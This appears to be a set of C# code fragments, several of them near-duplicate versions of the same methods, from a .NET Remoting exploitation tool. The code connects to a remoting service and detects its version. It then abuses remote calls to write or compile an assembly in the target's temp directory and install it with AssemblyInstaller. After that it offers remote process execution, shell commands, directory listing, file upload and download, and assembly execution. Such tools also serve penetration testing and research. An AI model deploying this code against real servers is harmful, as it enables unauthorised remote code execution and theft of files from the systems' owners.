static int Main(string[] args) { if (ProcessArgs(args)) { try { SetupServer(); if (_ver == 0) { _ver = DetectMajorVersion(); Console.WriteLine("Detected version {0} server", _ver); } IRemoteClass ret = CreateRemoteClass(); ExecuteCommand(ret); } catch (Exception ex) { Console.WriteLine(ex); return(1); } return(0); } else { return(1); } }
static int Main(string[] args) { if (ProcessArgs(args)) { try { var channel = new CustomChannel(_uri, BindStream, GetMessageObject, _null_uri, !string.IsNullOrEmpty(_output_path)); if (_cmd.Equals("raw")) { if (_cmdargs.Count != 1) { Console.Error.WriteLine("Must specify base64 encoded string or a file containing the raw data."); } else { string path = _cmdargs.First(); byte[] data; if (File.Exists(path)) { data = File.ReadAllBytes(path); } else { data = Convert.FromBase64String(path); } Console.WriteLine(channel.SendRequest(data)); } } else { SetupServer(); if (_ver == 0 && !_useser) { _ver = DetectMajorVersion(channel); Console.WriteLine("Detected version {0} server", _ver); } IRemoteClass ret = CreateRemoteClass(channel); ExecuteCommand(ret); } } catch (Exception ex) { Console.WriteLine(ex); return(1); } return(0); } else { return(1); } }
private static IRemoteClass CreateRemoteClassExploit(CustomChannel channel) { string path; if (_uri.Scheme != "ipc") { IRemoteClass ret = GetExistingRemoteClass(); try { ret.ToString(); return(ret); } catch (RemotingException) { } path = channel.MakeCall <string>(_uri.AbsolutePath, GetStaticMethod(typeof(Path), "GetTempPath")); path = Path.Combine(path, $"{Guid.NewGuid()}.dll"); channel.MakeCall(_uri.AbsolutePath, GetStaticMethod(typeof(File), "WriteAllBytes", new Type[] { typeof(string), typeof(byte[]) }), path, File.ReadAllBytes(typeof(IRemoteClass).Assembly.Location)); } else { path = typeof(IRemoteClass).Assembly.Location; } try { AssemblyInstaller installer = channel.MakeCall <AssemblyInstaller>(_uri.AbsolutePath, GetCreateInstance <AssemblyInstaller>()); installer.Path = path; installer.CommandLine = new string[] { "/name=" + _remotename }; installer.UseNewContext = true; installer.Install(new Hashtable()); } catch { // In the IPC case this might fail // Just continue on with the creation of the remote class and see if we're lucky } return(GetExistingRemoteClass()); }
/// <summary> /// Server /// </summary> /// <param name="sServerName"></param> /// <param name="iPort"></param> /// <param name="sAppURI"></param> public void CreateServerChannel(string sServerName, int iPort, string sAppURI) { try { //string sComputerName = System.Windows.Forms.SystemInformation.ComputerName; IPHostEntry oIPHostEntry = Dns.GetHostEntry(sServerName); IPAddress[] oIPAddress = oIPHostEntry.AddressList; RemotingConfiguration.Configure("Remoting.config", false); HttpServerChannel oHttpServerChannel = new HttpServerChannel(iPort); ChannelServices.RegisterChannel(oHttpServerChannel, false); RemotingConfiguration.RegisterWellKnownServiceType(System.Type.GetType("Server.ServerClass, Server"), sAppURI, WellKnownObjectMode.Singleton); oRemoteServer = (IRemoteClass)Activator.GetObject(typeof(IRemoteClass), "http://" + sServerName + ":" + iPort + "/" + sAppURI); } catch { } }
static int Main(string[] args) { if (ProcessArgs(args)) { try { SetupServer(); if (_ver == 0) { _ver = DetectMajorVersion(); Console.WriteLine("Detected version {0} server", _ver); } if (_cmd.Equals("raw")) { if (_cmdargs.Count != 1) { Console.Error.WriteLine("Must specify base64 encoded object"); } else { Console.WriteLine(SendRequest(_cmdargs.First <string>())); } } else { IRemoteClass ret = CreateRemoteClass(); ExecuteCommand(ret); } } catch (Exception ex) { Console.WriteLine(ex); return(1); } return(0); } else { return(1); } }
static int Main(string[] args) { if (ProcessArgs(args)) { try { SetupServer(); var channel = new CustomChannel(_uri, BindStream, GetMessageObject, _null_uri); if (_cmd.Equals("raw")) { if (_cmdargs.Count != 1) { Console.Error.WriteLine("Must specify base64 encoded object"); } else { Console.WriteLine(channel.SendRequest(Convert.FromBase64String(_cmdargs.First()))); } } else { if (_ver == 0 && !_useser) { _ver = DetectMajorVersion(channel); Console.WriteLine("Detected version {0} server", _ver); } IRemoteClass ret = CreateRemoteClass(channel); ExecuteCommand(ret); } } catch (Exception ex) { Console.WriteLine(ex); return(1); } return(0); } else { return(1); } }
public void CallBar(IRemoteClass bar) { var receiver = bar; receiver.Bar(); }
public void CallBar(IRemoteClass bar) { throw new NotImplementedException(); }
private static void ExecuteCommand(IRemoteClass c) { switch (_cmd) { case "exec": { bool wait = false; if (_cmdargs.Count > 0) { if (_cmdargs[0].Equals("-wait", StringComparison.OrdinalIgnoreCase)) { wait = true; _cmdargs.RemoveAt(0); } } if ((_cmdargs.Count == 0) || (_cmdargs.Count > 2)) { Console.Error.WriteLine("Must specify at least 1 or two options for exec command"); } else { string cmd = _cmdargs[0]; string cmdline = _cmdargs.Count > 1 ? _cmdargs[1] : String.Empty; Process p = c.RunProcess(cmd, cmdline); Console.WriteLine("Received new process id {0}", p.Id); if (wait) { p.WaitForExit(); } } } break; case "cmd": if (_cmdargs.Count != 1) { Console.Error.WriteLine("Must specify 1 argument for cmd command"); } else { string ret = c.RunCommand(_cmdargs[0]); Console.WriteLine(ret); } break; case "ls": if (_cmdargs.Count != 1) { Console.Error.WriteLine("Must specify 1 argument for ls command"); } else { DirectoryInfo dir = c.GetDirectory(_cmdargs[0]); Console.WriteLine("Listing {0} directory", dir.FullName); foreach (DirectoryInfo d in dir.GetDirectories()) { Console.WriteLine("<DIR> {0}", d.Name); } foreach (FileInfo f in dir.GetFiles()) { Console.WriteLine("{0} - Length {1}", f.Name, f.Length); } } break; case "put": if (_cmdargs.Count != 2) { Console.Error.WriteLine("Must specify localfile and remotefile argument"); } else { byte[] data = File.ReadAllBytes(_cmdargs[0]); c.WriteFile(_cmdargs[1].ToString(), data); } break; case "get": if (_cmdargs.Count != 2) { Console.Error.WriteLine("Must specify localfile and remotefile argument"); } else { byte[] data = c.ReadFile(_cmdargs[0]); File.WriteAllBytes(_cmdargs[1], data); } break; case "run": if (_cmdargs.Count < 1) { Console.Error.WriteLine("Must specify an assembly file to upload"); } else { byte[] asm = File.ReadAllBytes(_cmdargs[0]); string[] args = _cmdargs.Skip(1).ToArray(); Console.WriteLine("Result: {0}", c.ExecuteAssembly(asm, args)); } break; case "user": Console.WriteLine("User: {0}", c.GetUsername()); break; case "osver": Console.WriteLine("OS: {0}", c.GetOSVersion()); break; default: Console.Error.WriteLine(String.Format("Unknown command {0}", _cmd)); break; } }
private static IRemoteClass CreateRemoteClass() { if (_useser) { SerializerRemoteClass remote = new SerializerRemoteClass(); if (!String.IsNullOrWhiteSpace(_installdir)) { string path = Path.Combine(_installdir, "FakeAsm.dll"); bool installed = true; try { installed = remote.FileExists(path); } catch (Exception ex) { Trace.WriteLine(ex.ToString()); } if (!installed) { Uri uri = new Uri(typeof(IRemoteClass).Assembly.CodeBase, UriKind.Absolute); try { remote.WriteFile(path, File.ReadAllBytes(uri.LocalPath)); } catch { } } try { Trace.WriteLine(String.Format("{0}", SendRequest(new SerializableRegister(_remotename), false))); } catch { } } try { IRemoteClass ret = GetExistingRemoteClass(); ret.ToString(); return(ret); } catch (Exception ex) { Trace.WriteLine(ex.ToString()); } return(remote); } else { string path; if (_uri.Scheme != "ipc") { IRemoteClass ret = GetExistingRemoteClass(); try { ret.ToString(); return(ret); } catch (RemotingException) { } path = MakeCall <string>(_uri.AbsolutePath, GetStaticMethod(typeof(Path), "GetTempPath")); path = Path.Combine(path, "FakeAsm.dll"); CodeDomProvider compiler = MakeCall <CodeDomProvider>(_uri.AbsolutePath, GetCreateInstance <CSharpCodeProvider>()); string uri = RemotingServices.GetObjectUri(compiler); CompilerParameters cp = new CompilerParameters(); cp.ReferencedAssemblies.Add("System.dll"); cp.ReferencedAssemblies.Add("System.Configuration.Install.dll"); cp.OutputAssembly = path; cp.GenerateInMemory = false; cp.GenerateExecutable = false; string code = GetResource("RemoteClass.cs"); string intf = GetResource("IRemoteClass.cs"); string inst = GetResource("InstallClass.cs"); CompilerResults res = MakeCall <CompilerResults>(uri, new FakeMethod(typeof(CodeDomProvider).GetMethod("CompileAssemblyFromSource"), _ver), cp, new string[] { code, intf, inst }); } else { path = typeof(IRemoteClass).Assembly.Location; } try { AssemblyInstaller installer = MakeCall <AssemblyInstaller>(_uri.AbsolutePath, GetCreateInstance <AssemblyInstaller>()); installer.Path = path; installer.CommandLine = new string[] { "/name=" + _remotename }; installer.UseNewContext = true; installer.Install(new Hashtable()); } catch { // In the IPC case this might fail // Just continue on with the creation of the remote class and see if we're lucky } return(GetExistingRemoteClass()); } }
private static IRemoteClass CreateRemoteClass() { if (_useser) { return(new SerializerRemoteClass()); } else { string path; if (_uri.Scheme != "ipc") { IRemoteClass ret = GetExistingRemoteClass(); try { ret.ToString(); return(ret); } catch (RemotingException) { } path = MakeCall <string>(_uri.AbsolutePath, GetStaticMethod(typeof(Path), "GetTempPath")); path = Path.Combine(path, "Installer.dll"); CodeDomProvider compiler = MakeCall <CodeDomProvider>(_uri.AbsolutePath, GetCreateInstance <CSharpCodeProvider>()); string uri = RemotingServices.GetObjectUri(compiler); CompilerParameters cp = new CompilerParameters(); cp.ReferencedAssemblies.Add("System.dll"); cp.ReferencedAssemblies.Add("System.Configuration.Install.dll"); cp.OutputAssembly = path; cp.GenerateInMemory = false; cp.GenerateExecutable = false; string code = GetResource("RemoteClass.cs"); string intf = GetResource("IRemoteClass.cs"); string inst = GetResource("InstallClass.cs"); CompilerResults res = MakeCall <CompilerResults>(uri, new FakeMethod(typeof(CodeDomProvider).GetMethod("CompileAssemblyFromSource"), _ver), cp, new string[] { code, intf, inst }); } else { path = typeof(IRemoteClass).Assembly.Location; } try { AssemblyInstaller installer = MakeCall <AssemblyInstaller>(_uri.AbsolutePath, GetCreateInstance <AssemblyInstaller>()); installer.Path = path; installer.CommandLine = new string[] { "/name=" + _remotename }; installer.UseNewContext = true; installer.Install(new Hashtable()); } catch { // In the IPC case this might fail // Just continue on with the creation of the remote class and see if we're lucky } return(GetExistingRemoteClass()); } }
private static IRemoteClass CreateRemoteClassSerial(CustomChannel channel) { ILease lease = null; if (_uselease) { lease = channel.MakeCall <ILease>(_uri.AbsolutePath, typeof(MarshalByRefObject).GetMethod("InitializeLifetimeService")); } SerializerRemoteClass remote = new SerializerRemoteClass(channel, lease); if (!string.IsNullOrWhiteSpace(_installdir) || _autodir) { if (_autodir) { DirectoryInfo curr_dir = remote.GetDirectory("."); _installdir = curr_dir.FullName; } string path = Path.Combine(_installdir, "FakeAsm.dll"); bool installed = true; try { installed = remote.FileExists(path); } catch (Exception ex) { Trace.WriteLine(ex.ToString()); } if (!installed) { try { remote.WriteFile(path, File.ReadAllBytes(typeof(IRemoteClass).Assembly.Location)); } catch { } } try { Trace.WriteLine(string.Format("{0}", channel.SendRequest(new SerializableRegister(_remotename), false))); } catch { } } try { IRemoteClass ret = GetExistingRemoteClass(); ret.ToString(); return(ret); } catch (Exception ex) { Trace.WriteLine(ex.ToString()); } return(remote); }
public void CallBar(IRemoteClass bar) { var receiver = bar; receiver.Bar(); }
public void CallBar(IRemoteClass bar) { throw new NotImplementedException(); }